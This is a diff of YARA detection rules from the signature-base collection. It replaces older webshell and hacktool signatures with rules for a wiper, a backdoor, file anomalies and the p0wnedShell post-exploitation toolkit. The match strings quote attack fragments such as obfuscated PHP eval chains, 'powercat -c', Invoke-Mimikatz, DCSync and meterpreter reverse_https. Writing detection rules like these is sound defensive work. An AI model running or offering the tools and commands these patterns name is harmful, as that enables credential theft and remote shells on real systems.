-		$s3 = "%s -Uninstall                        -->To Uninstall The Service"
-		$s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN"
+		$a0 = "<Task version=" ascii wide
+		$a1 = "xmlns=\"http://schemas.microsoft.com/windows/" ascii wide
+		$fp1 = "</Counter><Counter>" wide
+		$fp2 = "Office Feature Updates Logon" wide
+		$fp3 = "Microsoft Shared" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xfeff and filesize > 20KB and all of ( $a* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Hytop_Devpack_Fso
+rule SIGNATURE_BASE_SUSP_Putty_Unnormal_Size : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file fso.asp"
+		description = "Detects a putty version with a size different than the one provided by Simon Tatham (could be caused by an additional signature or malware)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "094eeff9-0da0-5a44-a45c-f8ee57861e7a"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7153-L7165"
+		id = "576b118c-d4be-5ce2-994a-ce3f943dda88"
+		date = "2019-01-07"
+		modified = "2022-06-30"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L448-L498"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b37f3cde1a08890bd822a182c3a881f6"
-		logic_hash = "9d071c1e2e0725091a2abe24759e6e71d78e29caa76b4fff77c44e3bb381b1a2"
-		score = 75
+		logic_hash = "2f2c21cc25eaba8c1812db617203427a59e9a55f8620676e4bbe4cb3cd4071fd"
+		score = 50
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "e5e89bdff733d6db1cffe8b3527e823c32a78076f8eadc2f9fd486b74a0e9d88"
+		hash2 = "ce4c1b718b54973291aefdd63d1cca4e4d8d4f5353a2be7f139a290206d0c170"
+		hash3 = "adb72ea4eab7b2efc2da6e72256b5a3bb388e9cdd4da4d3ff42a9fec080aa96f"
+		hash4 = "1c0bd6660fa43fa90bd88b56cdd4a4c2ffb4ef9d04e8893109407aa7039277db"
 
 	strings:
-		$s0 = "<!-- PageFSO Below -->"
-		$s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli"
+		$s1 = "SSH, Telnet and Rlogin client" fullword wide
+		$v1 = "Release 0.6" wide
+		$v2 = "Release 0.70" wide
+		$fp1 = "KiTTY fork" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and $s1 and 1 of ( $v* ) and not 1 of ( $fp* ) and filesize != 524288 and filesize != 495616 and filesize != 483328 and filesize != 524288 and filesize != 712176 and filesize != 828400 and filesize != 569328 and filesize != 454656 and filesize != 531368 and filesize != 524288 and filesize != 483328 and filesize != 713592 and filesize != 829304 and filesize != 571256 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 774200 and filesize != 854072 and filesize != 665144 and filesize != 640000 and filesize != 650720 and filesize != 662808 and filesize != 651256 and filesize != 664432
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Ssh
+rule SIGNATURE_BASE_SUSP_RTF_Header_Anomaly : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ssh.php"
+		description = "Detects malformed RTF header often used to trick mechanisms that check for a full RTF header"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0b971065-df16-5092-beff-c55608447f19"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7166-L7177"
+		id = "fb362640-9a45-5ee5-8749-3980e0549932"
+		date = "2019-01-20"
+		modified = "2022-09-15"
+		reference = "https://twitter.com/ItsReallyNick/status/975705759618158593"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_anomalies.yar#L500-L512"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1aa5307790d72941589079989b4f900e"
-		logic_hash = "40c5a5d1d714947454f4aa9f7ed09d777cb60c23933201ac8eaf0d49452af8c6"
-		score = 75
+		logic_hash = "c0be95894edc861cf322309f2c86a8ab986bb111dfdeea1990b4a074d5ab9ea3"
+		score = 50
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "eval(gzinflate(str_rot13(base64_decode('"
+		tags = "FILE"
 
 	condition:
-		all of them
+		uint32( 0 ) == 0x74725c7b and not uint8( 4 ) == 0x66
 }
-rule SIGNATURE_BASE_Debug_Bdoor
+
+rule SIGNATURE_BASE_Kaspermalware_Oct17_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file BDoor.dll"
+		description = "Detects Kasper Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0938efe7-2b6d-5749-af9a-967cca85defb"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7178-L7190"
+		id = "7201d8ee-50ee-5a5c-a5b8-ee36c78b0d6e"
+		date = "2017-10-24"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_kasper_oct17.yar#L13-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e4e8e31dd44beb9320922c5f49739955"
-		logic_hash = "ed8caeb96a6fc48fe23d5db078bbb8ba5aec3c5d4ee382cbc6bc4e01630f1460"
+		logic_hash = "15758407fb3039f1453f13d579d7df9525645e4717078f6b1fa482ab335e3a56"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "758bdaf26a0bd309a5458cb4569fe1c789cf5db087880d6d1676dec051c3a28d"
 
 	strings:
-		$s1 = "\\BDoor\\"
-		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
+		$x1 = "\\Release\\kasper.pdb" ascii
+		$x2 = "C:\\D@oc@um@en@ts a@nd Set@tings\\Al@l Users" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 7000KB and ( pe.imphash ( ) == "2bceb64cf37acd34bc33b38f2cddfb61" or 1 of them )
 }
-rule SIGNATURE_BASE_Bin_Client
+rule SIGNATURE_BASE_MAL_WIPER_Unknown_Jun25 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file Client.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8564d787-5edc-59b0-b1ef-2f33c8a24f82"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7191-L7205"
+		description = "Detects unknown disk wiper first spotted in June 2025 and uploaded from Israel"
+		author = "Florian Roth"
+		id = "bd5ae026-389e-57fa-9b97-1062257de92e"
+		date = "2025-06-19"
+		modified = "2025-07-01"
+		reference = "https://x.com/cyb3rops/status/1935707307805134975"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_wipers_jun25.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5f91a5b46d155cacf0cc6673a2a5461b"
-		logic_hash = "28ce9aa136b5d41bb580e6b5b8580d3ccbb7eeec31007e68241d23c5a0f40d40"
+		logic_hash = "64569f65814d63e55ea938e3dd9bd359da4597328887bdacf37bb5545ea32424"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 35
+		tags = "FILE"
+		hash1 = "12c39f052f030a77c0cd531df86ad3477f46d1287b8b98b625d1dcf89385d721"
 
 	strings:
-		$s0 = "Recieved respond from server!!"
-		$s4 = "packet door client"
-		$s5 = "input source port(whatever you want):"
-		$s7 = "Packet sent,waiting for reply..."
+		$x1 = "\\CWipeNew\\Release\\" ascii fullword
+		$s1 = "Failed to get disk geometry: " wide fullword
+		$s2 = "--- Working on " wide fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Zxshell2_0_Rar_Folder_Zxshell
+rule SIGNATURE_BASE_SUSP_LNX_SH_Disk_Wiper_Script_Jun25 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ZXshell.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "621ac87e-b1f8-58d7-9328-54af5ca9b605"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7206-L7218"
+		description = "Detects unknown disk wiper script for Linux systems"
+		author = "Florian Roth"
+		id = "837e5b22-2168-53f7-8d48-429a48e5a469"
+		date = "2025-06-19"
+		modified = "2025-07-01"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_wipers_jun25.yar#L23-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "246ce44502d2f6002d720d350e26c288"
-		logic_hash = "72eaf90551144eccb7329e0a0e05bcc955ea2bfdb37aa87e9cae7b5f5a26bea0"
-		score = 75
+		logic_hash = "99a0a393c2a636c10195c7ad85f3b282a30ba05fbc0f0db7fc04b0f79fbc6760"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "f662f69fc7f4240cd8c00661db9484e76b5d02f903590140b4086fefcf9d9331"
 
 	strings:
-		$s0 = "WPreviewPagesn"
-		$s1 = "DA!OLUTELY N"
+		$s1 = "THIS SCRIPT IS LIVE AND ARMED!" ascii fullword
+		$s2 = "FAIR WARNING!" ascii fullword
+		$s3 = "lists devices" ascii fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x2123 and filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_Rkntload
+rule SIGNATURE_BASE_SUSP_PY_Pyinstaller_Swiper_Jun25 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file RkNTLoad.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fd4b1343-5fa9-5ad8-bee1-6b06b93ddfbe"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7219-L7237"
+		description = "Detects suspicious Python based executable with similarities to a known disk wiper"
+		author = "Florian Roth"
+		id = "1b16598b-58df-599f-991b-00284b770d8e"
+		date = "2025-06-19"
+		modified = "2025-07-01"
+		reference = "https://x.com/cyb3rops/status/1935707307805134975"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_wipers_jun25.yar#L41-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "262317c95ced56224f136ba532b8b34f"
-		logic_hash = "ab767a7016318633055a85195ca2bab08a8c68222d46018aaf8772ab27a373c4"
-		score = 75
+		logic_hash = "824bdda031336b2d9a60b09bfa36e68a2e03159b217c9c25dd708df454144e1e"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "4f669ecbe12e95d51f37be76933de4c2626d20bb01729086ce2efc603c4ffdf3"
 
 	strings:
-		$s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
-		$s2 = "5pur+virtu!"
-		$s3 = "ugh spac#n"
-		$s4 = "xcEx3WriL4"
-		$s5 = "runtime error"
-		$s6 = "loseHWait.Sr."
-		$s7 = "essageBoxAw"
-		$s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $"
+		$a1 = "bzlib1.dll" ascii fullword
+		$a2 = "VCRUNTIME140_1.dll" wide fullword
+		$a3 = "%s%c%s.exe" ascii fullword
+		$sc1 = { 73 77 69 70 65 72 00 00 00 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 40000KB and all of them
 }
-rule SIGNATURE_BASE_Binder2_Binder2
+rule SIGNATURE_BASE_APT_MAL_IR_Druidfly_Wiper_Jun25 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file binder2.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "29269dc0-f2e4-56ec-ad64-0dff00e339b7"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7238-L7254"
+		description = "Detects Wiper used by the Iranian DruidFly group"
+		author = "Florian Roth"
+		id = "e3490d0e-369a-52ab-a9c1-b1c5b011c7db"
+		date = "2025-06-21"
+		modified = "2025-07-01"
+		reference = "https://x.com/threatintel/status/1936049254432231444"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_wipers_jun25.yar#L61-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d594e90ad23ae0bc0b65b59189c12f11"
-		logic_hash = "fbe56b7d37fc7863fcf55761c0b5b671d661a713ac95f90d65b79eee9a447a9b"
-		score = 75
+		logic_hash = "9d3872506b03ea03a2c3cd7304c6b2d9dfafa04a29e19dc9be4924eaaa5db2d6"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "81eb22828306f3197b35fef2035cef2c548f587f8511902852964850023389d7"
 
 	strings:
-		$s0 = "IsCharAlphaNumericA"
-		$s2 = "WideCharToM"
-		$s4 = "g 5pur+virtu!"
-		$s5 = "\\syslog.en"
-		$s6 = "heap7'7oqk?not="
-		$s8 = "- Kablto in"
+		$xc1 = { 2E 62 61 63 6B 75 70 00 2E 63 6F 6E 66 69 67 00   // .backup .config
+               2E 64 62 00 00 00 00 00 2E 73 71 6C 69 74 65 00 }
+		$xc2 = { 00 5C 5C 2E 5C 25 63 3A 00 25 63 3A 5C 00 00 00
+               00 4E 54 46 53 00 00 00 00 5C }
+		$x1 = "%s:%d:%s(): [+] Overwriting \"%s\" \"..." ascii
+		$s1 = "C:\\Windows\\System32\\drivers\\beep.sys" ascii fullword
+		$s2 = "\\DosDevices\\sectorio" wide fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
 }
-rule SIGNATURE_BASE_Thelast_Orice2
+rule SIGNATURE_BASE_P0Wnedpowercat : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file orice2.php"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPowerCat.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "968cef9e-0163-5f4a-91e3-07510f9f4fcd"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7255-L7267"
+		id = "059a8e58-7b7e-582e-ba4a-80e4dffe9b5e"
+		date = "2017-01-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L10-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aa63ffb27bde8d03d00dda04421237ae"
-		logic_hash = "075f3377a9b90c6c1ba74682415b9c0832a839afe647fa6d3c85d4e987618405"
+		logic_hash = "5882d0f91f237d2abe1149421db0e217e6dfcca70130d346a70d5c851eca085f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6a3ba991d3b5d127c4325bc194b3241dde5b3a5853b78b4df1bce7cbe87c0fdf"
 
 	strings:
-		$s0 = " $aa = $_GET['aa'];"
-		$s1 = "echo $aa;"
+		$x1 = "Now if we point Firefox to http://127.0.0.1" fullword ascii
+		$x2 = "powercat -l -v -p" fullword ascii
+		$x3 = "P0wnedListener" fullword ascii
+		$x4 = "EncodedPayload.bat" fullword ascii
+		$x5 = "powercat -c " fullword ascii
+		$x6 = "Program.P0wnedPath()" ascii
+		$x7 = "Invoke-PowerShellTcpOneLine" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x7375 and filesize < 150KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_FSO_S_Sincap
+rule SIGNATURE_BASE_Hacktool_Strings_P0Wnedshell : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file sincap.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fcee20a3-e71b-5f69-ac67-8660fd270703"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7268-L7280"
+		description = "Detects strings found in Runspace Post Exploitation Toolkit"
+		author = "Florian Roth"
+		id = "0846039d-1e00-5224-9560-55ab18034d54"
+		date = "2017-01-14"
+		modified = "2023-02-10"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L31-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"
-		logic_hash = "705030e93248f5ea6744f78bd7a1816aaa9772880059286b8d686e05b193d4a0"
+		logic_hash = "faec8f0af877f1a80ff994e08c756728cea5f58000f7124c1a6e7e4c86e7f5c0"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60"
+		nodeepdive = 1
 
 	strings:
-		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"
-		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="
+		$x1 = "Invoke-TokenManipulation" fullword ascii
+		$x2 = "windows/meterpreter" fullword ascii
+		$x3 = "lsadump::dcsync" fullword ascii
+		$x4 = "p0wnedShellx86" fullword ascii
+		$x5 = "p0wnedShellx64" fullword ascii
+		$x6 = "Invoke_PsExec()" fullword ascii
+		$x7 = "Invoke-Mimikatz" fullword ascii
+		$x8 = "Invoke_Shellcode()" fullword ascii
+		$x9 = "Invoke-ReflectivePEInjection" ascii
+		$fp1 = "Sentinel Labs, Inc." wide
+		$fp2 = "Copyright Elasticsearch B.V." ascii wide
+		$fp3 = "Attack Information: Invoke-Mimikatz" ascii
+		$fp4 = "a30226 || INDICATOR-SHELLCODE Metasploit windows/meterpreter stage transfer attempt"
+		$fp5 = "use strict"
 
 	condition:
-		all of them
+		filesize < 20MB and 1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Phpshell
+rule SIGNATURE_BASE_P0Wnedpotato
 {
 	meta:
-		description = "Webshells Auto-generated - file PhpShell.php"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "887264d3-5704-5e38-b0a6-44d529258ea2"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7281-L7292"
+		id = "2c2378e3-b948-5325-9afd-76424a7130b1"
+		date = "2017-01-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L64-L81"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "539baa0d39a9cf3c64d65ee7a8738620"
-		logic_hash = "95b3cedac370bf9b06092035a738722f3ec97e6cbafe3d4f742429a865576ad8"
+		logic_hash = "d9107db6c6460429358a2f9f1f47d103e96811152e8d03517871ff0c66578d05"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "aff2b694a01b48ef96c82daf387b25845abbe01073b76316f1aab3142fdb235b"
 
 	strings:
-		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
+		$x1 = "Invoke-Tater" fullword ascii
+		$x2 = "P0wnedListener.Execute(WPAD_Proxy);" fullword ascii
+		$x3 = " -SpooferIP " ascii
+		$x4 = "TaterCommand()" ascii
+		$x5 = "FileName = \"cmd.exe\"," fullword ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Hytop_Devpack_Config
+rule SIGNATURE_BASE_P0Wnedexploits
 {
 	meta:
-		description = "Webshells Auto-generated - file config.asp"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "da1b8ce1-8b17-53f6-a86b-ad3fe918084e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7293-L7306"
+		id = "9f754f5f-85e8-5b6f-bde2-566da4d39586"
+		date = "2017-01-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L83-L97"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b41d0e64e64a685178a3155195921d61"
-		logic_hash = "b2806c30db413bca518943352f233c9d2915356a41eceed5e352b88ee34fbbd3"
+		logic_hash = "40f23316117faa63fa9e9a5d281600f8e9d41857aac815d22559391c74dec157"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "54548e7848e742566f5596d8f02eca1fd2cbfeae88648b01efb7bab014b9301b"
 
 	strings:
-		$s0 = "const adminPassword=\""
-		$s2 = "const userPassword=\""
-		$s3 = "const mVersion="
+		$x1 = "Pshell.RunPSCommand(Whoami);" fullword ascii
+		$x2 = "If succeeded this exploit should popup a System CMD Shell" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Sendmail
+rule SIGNATURE_BASE_P0Wnedshellx64
 {
 	meta:
-		description = "Webshells Auto-generated - file sendmail.exe"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShellx64.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd33c2bb-61bf-57b7-82b9-d864097f7a56"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7307-L7319"
+		id = "c9791804-4f08-5b7e-8d9d-37e2dfccec47"
+		date = "2017-01-14"
+		modified = "2021-09-15"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L99-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "75b86f4a21d8adefaf34b3a94629bd17"
-		logic_hash = "bcca9a9380d2695bc277afc9fa72c24cb26ac44c6fbcc87113b017cfe190bdab"
+		logic_hash = "d7cd33548ed3485cc6f3cd289813a8eb83b34e800b839c5c8f8add5f9e01a3da"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d8b4f5440627cf70fa0e0e19e0359b59e671885f8c1855517211ba331f48c449"
 
 	strings:
-		$s3 = "_NextPyC808"
-		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
+		$x1 = "Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9Pjgb/+kPPhv9Sjp01Wf" wide
+		$x2 = "Invoke-TokenManipulation" wide
+		$x3 = "-CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"" fullword wide
+		$x4 = "CommandShell with Local Administrator privileges :)" fullword wide
+		$x5 = "Invoke-shellcode -Payload windows/meterpreter/reverse_https -Lhost " fullword wide
+		$fp1 = "AVSignature" ascii wide
 
 	condition:
-		all of them
+		1 of ( $x* ) and not 1 of them
 }
-rule SIGNATURE_BASE_FSO_S_Zehir4
+rule SIGNATURE_BASE_P0Wnedlistenerconsole
 {
 	meta:
-		description = "Webshells Auto-generated - file zehir4.asp"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedListenerConsole.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f1adcd6-b721-54ef-a20f-c3a353629a40"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7320-L7331"
+		id = "77d13c34-3e15-5bc1-a100-f04be38cfb44"
+		date = "2017-01-14"
+		modified = "2023-12-05"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_p0wnshell.yar#L120-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5b496a61363d304532bcf52ee21f5d55"
-		logic_hash = "6bcfb1ee40403394bf996ecbe1bb17f9afa0c3ba9e1906881b94bbc785b4a510"
+		logic_hash = "068e590f6f4f99c27814f2bf96d51e1c8c6422afcf8b99bb9f1852216335da7b"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d2d84e65fad966a8556696fdaab5dc8110fc058c9e9caa7ea78aa00921ae3169"
 
 	strings:
-		$s5 = " byMesaj "
+		$x1 = "Invoke_ReflectivePEInjection" fullword wide
+		$x5 = "p0wnedShell> " fullword wide
+		$x6 = "Resources.Get_PassHashes" fullword wide
+		$s7 = "Invoke_CredentialsPhish" fullword wide
+		$s8 = "Invoke_Shellcode" fullword wide
+		$s9 = "Resources.Invoke_TokenManipulation" fullword wide
+		$s10 = "Resources.Port_Scan" fullword wide
+		$s20 = "Invoke_PowerUp" fullword wide
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Hkshell_Hkshell
+rule SIGNATURE_BASE_P0Wnedbinaries
 {
 	meta:
-		description = "Webshells Auto-generated - file hkshell.exe"
+		description = "p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7436cd7c-7027-56dc-bb62-fac0f70c27d8"
-		date = "2016-02-15"
